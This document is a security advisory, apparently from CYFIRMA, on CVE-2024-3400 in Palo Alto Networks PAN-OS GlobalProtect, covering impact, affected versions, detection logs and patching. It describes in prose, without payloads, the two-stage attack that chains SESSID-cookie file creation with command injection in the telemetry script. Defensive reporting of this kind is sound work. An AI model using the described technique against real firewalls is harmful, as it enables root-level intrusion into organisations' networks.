This research report explores critical security vulnerabilities that have emerged in the cybersecurity landscape. Firstly, Palo Alto Networks uncovered CVE-2024-3400, which was exploited by threat actor βUTA0218β through a sophisticated two-stage attack. This flaw enabled the actor to execute commands on vulnerable PAN-OS devices by sending specially crafted requests using a backdoor mechanism. Secondly, CISA identified CVE-2024-3400 β a severe security vulnerability affecting Palo Alto Networks PAN-OS software β and promptly added it to its Known Exploited Vulnerabilities catalog. These developments underscore the pressing need for organizations to understand, mitigate, and address emerging threats to safeguard their digital assets and infrastructure.
The discovery of a critical vulnerability within Palo Alto Networks PAN-OS software has brought to light a significant security concern affecting a vast number of devices. Our investigation has revealed an alarming figure: 64,584 publicly accessible PAN-OS devices may be susceptible to this flaw, underscoring the extensive reach and potential impact the vulnerability may have across diverse networks and organizations. In this report, we delve into the details of the vulnerability, its implications, and the urgent need for remediation measures to mitigate the associated risks effectively.
Key Takeaways:
Acknowledgements:
The CYFIRMA Research team acknowledge security researchers who responsibly disclosed this vulnerability.
Vulnerability Type: Command injection
CVE ID: CVE-2024-3400
CVSS Severity Score: 10 (Critical)
Application: Palo Alto Networks PAN-OS
Impact: Allowing to perform root privileges
Severity: Critical
Affected Versions: Palo Alto Networks versions before PAN-OS 11.1 (before 11.1.2-h3)
Patch Available: Yes
The exploit targets CVE-2024-3400, a command injection vulnerability in Palo Alto Networks PAN-OS software, enabling unauthenticated attackers to execute arbitrary code with root privileges on affected firewall appliances. By manipulating file creation and telemetry features, attackers gain unauthorized access and can execute commands remotely. Detection involves monitoring network logs for suspicious activity, and remediation includes applying patches and vendor-supplied mitigations to prevent further exploitation.
The impact of the vulnerability (CVE-2024-3400) is significant as it allows unauthenticated attackers to execute arbitrary code with root privileges on Palo Alto Networks firewall appliances running affected versions of PAN-OS software. This grants attackers complete control over the firewall, enabling them to manipulate network traffic, exfiltrate sensitive data, disrupt services, and potentially launch further attacks within the network. Additionally, exploitation of this vulnerability can lead to unauthorized access to critical infrastructure, compromise of sensitive information, and disruption of business operations, posing a serious risk to affected organizations.
The following versions of PAN-OS are affected by CVE-2024-3400 as of April 16, 2024:
Is there already an exploit tool to attack this vulnerability?
Yes, an exploit tool for attacking CVE-2024-3400 is available. Hackers have developed tools to exploit this vulnerability, enabling them to execute arbitrary code with root privileges on vulnerable Palo Alto Networks firewall appliances.
Has this vulnerability already been used in an attack?
Yes, CVE-2024-3400 has already been used in attacks. Security researchers have observed instances of in-the-wild exploitation of this vulnerability, with attackers leveraging it to gain unauthorized access and execute arbitrary code with root privileges on affected Palo Alto Networks firewall appliances. Additionally, there have been reports of backdoor malware being deployed in conjunction with this vulnerability to further compromise targeted systems and networks.
Are hackers discussing this vulnerability in the Deep/Dark Web?
Yes, with some actively sharing proof-of-concept (PoC) exploits and exchanging information on how to leverage this vulnerability for unauthorized access and privilege escalation. These discussions often involve sharing techniques, code snippets, and strategies for exploiting the vulnerability in different environments.
What is the attack complexity level?
This is considered to be relatively low to medium. While the vulnerability itself does not require authentication and can be exploited remotely, the successful execution of arbitrary code with root privileges may involve some level of technical expertise and understanding of the underlying system.
The exploit leverages a command injection vulnerability present in the GlobalProtect feature of Palo Alto Networks PAN-OS software, which allows an unauthenticated attacker to execute arbitrary code with root privileges on the targeted firewall appliance. Initially, the attacker exploits an arbitrary file creation vulnerability in the /var/appweb/htdocs directory to plant a web shell and a statically linked SUID binary named root, thus gaining root-level access to the device. Subsequently, the attacker examines the patched gpsvc binary to identify changes, focusing on the addition of a new function main_isValidSessionId aimed at preventing invalid UUID values. Exploiting the arbitrary file creation flaw in GlobalProtect, the attacker manipulates the SESSID cookie to create files with arbitrary names in specific locations on the file system, facilitating further exploitation.
Furthermore, the attacker exploits the command injection vulnerability in the device telemetry feature, primarily targeting the dt_send script, to execute arbitrary commands via crafted file names. By injecting malicious commands into the telemetry data transmitted by the firewall, the attacker can trigger remote code execution. This is achieved by crafting a payload embedded in the SESSID cookie value and sending an unauthenticated cURL request to the GlobalProtect web server.
As the server processes the telemetry transmission process periodically, the injected payload is executed, allowing the attacker to execute arbitrary commands with root privileges.
To detect and respond to such attacks, monitoring of network logs is crucial, particularly in directories like /var/log/nginx/sslvpn_access.log, /var/log/pan/sslvpn-access/sslvpn-access.log, and /var/log/pan/device_telemetry_send.log. Additionally, vigilant monitoring for unexpected file creations in /tmp/sslvpn and /opt/panlogs/tmp/device_telemetry/ can help identify signs of exploitation. Remediation efforts should include applying patches for vulnerable PAN-OS versions and implementing vendor-supplied mitigations to prevent further exploitation of the identified vulnerabilities.
To mitigate the vulnerability (CVE-2024-3400) in Palo Alto Networks PAN-OS software, several actions can be taken. Firstly, ensure that the PAN-OS software is updated to the latest version provided by Palo Alto Networks, as this will contain fixes for the vulnerability. Additionally, if GlobalProtect is not necessary for your network, consider disabling it to reduce the attack surface. Monitoring logs for any suspicious activity, such as unauthorized access attempts or unusual file creations, can also help detect exploitation attempts. Implementing strong password policies, regularly updating software, and restricting access to critical systems are all important security practices that can help mitigate the risk associated with this vulnerability.
Target Geography:
Global oganizations that rely on Palo Alto Networks PAN-OS software and utilizing the affected versions are susceptible to this vulnerability, with the risk extending to regions such as the United States, Canada, Japan, China, India, the United Kingdom, France, Germany, Thailand and Brazil. The broad geographical implications underscore the universality of the threat, indicating that organizations worldwide may face exploitation risks if they utilize the compromised server.
Target Industry:
The vulnerability presents a significant threat to organizations across various sectors, particularly software companies and manufacturing, that rely heavily on Palo Alto Networks PAN-OS. Malicious actors may strategically target specific sectors based on the perceived value of the data or services enabled by PAN-OS software. Industries dealing with sensitive information or heavily dependent on PAN-OS for automation are at heightened risk of exploitation.
Target Technology:
The Palo Alto Networks PAN-OS software, specifically the GlobalProtect feature. GlobalProtect is a VPN feature used for remote access to enterprise networks. The vulnerability discussed (CVE-2024-3400) affects several recent versions of PAN-OS, including PAN-OS 11.1 (before 11.1.2-h3), PAN-OS 11.0 (before 11.0.4-h1), and PAN-OS 10.2 (before 10.2.7-h8, before 10.2.8-h3, before 10.2.9-h1). The exploit targets this technology to gain unauthorized access to the firewall appliances, allowing attackers to execute arbitrary code with root privileges.
In an underground forum, there’s active discourse revolving around exploiting a vulnerability found in Palo Alto Networks PAN-OS. Members are deliberating the prospect of selling exploits related to this vulnerability. Additionally, they’re dissecting the mechanics and potential ramifications of a proof-of-concept (PoC) associated with the exploit.
In conclusion, CVE-2024-3400 poses a significant risk to organizations using Palo Alto Networks PAN-OS software, as it allows unauthenticated attackers to execute arbitrary code with root privileges on affected firewalls. The exploitation of this vulnerability can lead to severe consequences, including unauthorized access, data breaches, and potentially widespread compromise of network security. It is crucial for affected organizations to apply the necessary patches provided by Palo Alto Networks promptly and implement additional security measures to mitigate the risk of exploitation. Proactive monitoring, regular software updates, and adherence to best security practices are essential to safeguard against such vulnerabilities in the future.
